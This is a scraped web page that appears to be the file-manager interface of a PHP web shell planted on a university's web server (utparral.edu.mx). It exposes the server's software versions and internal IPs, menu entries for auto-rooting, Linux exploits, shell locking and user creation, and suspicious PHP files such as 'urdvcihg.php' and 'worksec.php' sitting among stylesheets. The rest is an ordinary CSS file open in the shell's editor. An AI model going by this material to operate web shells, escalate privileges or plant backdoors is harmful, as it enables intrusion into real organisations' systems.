Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
opt /
lampp /
htdocs /
webalizer /
css /
[ HOME SHELL ]
Name
Size
Permission
Action
addons
[ DIR ]
drwxr-xr-x
modules
[ DIR ]
drwxr-xr-x
academico.css
3.01
KB
-rw-r--r--
avisos.css
1.62
KB
-rw-r--r--
beca.css
3.32
KB
-rw-r--r--
bootstrap.css
187.84
KB
-rw-r--r--
bootstrap.min.css
152.11
KB
-rw-r--r--
contraloriaEstilos.css
3.6
KB
-rw-r--r--
diplomado.css
3.33
KB
-rw-r--r--
directorio.css
3.75
KB
-rw-r--r--
estilosmenu.css
2.54
KB
-rw-r--r--
etica.css
1.7
KB
-rw-r--r--
evaluacion.css
3.33
KB
-rw-r--r--
evaluacionEstilos.css
3.33
KB
-rw-r--r--
index.css
3.16
KB
-rw-r--r--
iso.css
2.25
KB
-rw-r--r--
licitacion.css
1.7
KB
-rw-r--r--
logotipos.css
3.31
KB
-rw-r--r--
mdb.css
311.07
KB
-rw-r--r--
mdb.lite.css
242.01
KB
-rw-r--r--
mdb.lite.min.css
198.8
KB
-rw-r--r--
mdb.min.css
252.83
KB
-rw-r--r--
ofertaacademica.css
3.44
KB
-rw-r--r--
oferta.css
2.19
KB
-rw-r--r--
POA.css
3.32
KB
-rw-r--r--
reglamentos.css
3.75
KB
-rw-r--r--
sistema.css
3.31
KB
-rw-r--r--
style.min.css
259
B
-rw-r--r--
urdvcihg.php
760
B
-rw-r--r--
vida2.css
2.17
KB
-rw-r--r--
vinculacion.css
3.07
KB
-rw-r--r--
worksec.php
1.02
KB
-r--r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.css
/* Required height of parents of the Full Page Intro and Intro itself */ html, body, .view { height: 100%; } *, *::before, *::after { margin: 0; padding: 0; } @import url(https://fonts.googleapis.com/css?family=Montserrat:400,700|Josefin+Sans:400,600,700,400italic,600italic); body { background-color: #e4e9ed; font-family: Raleway, sans-serif; } .hero{ height: 100vh; width: 100%; position: fixed; top: 0; z-index: 9; transition: all 1.6s cubic-bezier(0.86, 0, 0.07, 1); } .hero.scrolled{ transform: translate3d(0, -100%, 0) scale(.75); opacity: 0; } .hero-inner{ background-size: cover; background-position: center; display: table; width: 100%; height: 100vh; position: fixed; top: 0; filter: brightness(50%); } .hero-title{ display: table-cell; vertical-align: middle; text-align: center; } h1, h2, h3, h4, h5, h6{ font-family: montserrat; } .font-2{ font-family: Raleway, sans-serif; font-weight: 700; } .title{ letter-spacing: .3em; text-transform: uppercase; } .text-light{ color: #fff } .font-alt{ font-family: 'georgia'; font-style: italic; color: #666; } .hero{ overflow: hidden; z-index: 1; } .content{ position: relative; background-color: white; border-top: 10px solid black; padding: 0; margin: 0; transition: all 1.6s cubic-bezier(0.86, 0, 0.07, 1); transform: translate3d(0, 20px, 0) scale(.75); opacity: 0; } .content.scrolled{ transform: translate3d(0, 0, 0) scale(1); opacity: 1; } .sd{ color: white; position: absolute; top: 605px; left: 50%; transform: translateX(-50%); font-weight: bold; } .sd:hover, .sd:focus{ color: black; opacity: .7; text-decoration: none; } .logotipos{ width: 80%; display: flex; flex-flow: wrap; } .logos img{ height: 80px; padding-left: 10px; padding-top: 10px; align-items: flex-start; align-content: flex-end; display: flex; } .carousel-item img{ width: 100%; height: 100%; } @media (max-width:768px){ #wowslider-container1{ width: 100%; height: 50%; } .ws_images{ width: 100%; height: 50%; } } @media (max-width:992px){ #wowslider-container1{ width: 100%; height: 50%; } .ws_images{ width: 100%; height: 50%; } } @media (max-width: 768px) { .heading{ font-size: 15px; color: #5d4267; } .title { align-self: center; justify-self: center; color: white; text-transform: uppercase; font-size: 20px; text-shadow: 0px 2px 4px rgba(0,0,0,.4); } } @media (max-width: 768px) { .display-3 { font-size: 20px; color: #5d4267; } .title { align-self: center; justify-self: center; color: white; text-transform: uppercase; font-size: 25px; text-shadow: 0px 2px 4px rgba(0,0,0,.4); } } @media (max-width: 992px) { .display-3 { margin: 0 3rem; /* font-weight: 300;*/ font-size: 25px; color: #5d4267; } }
Close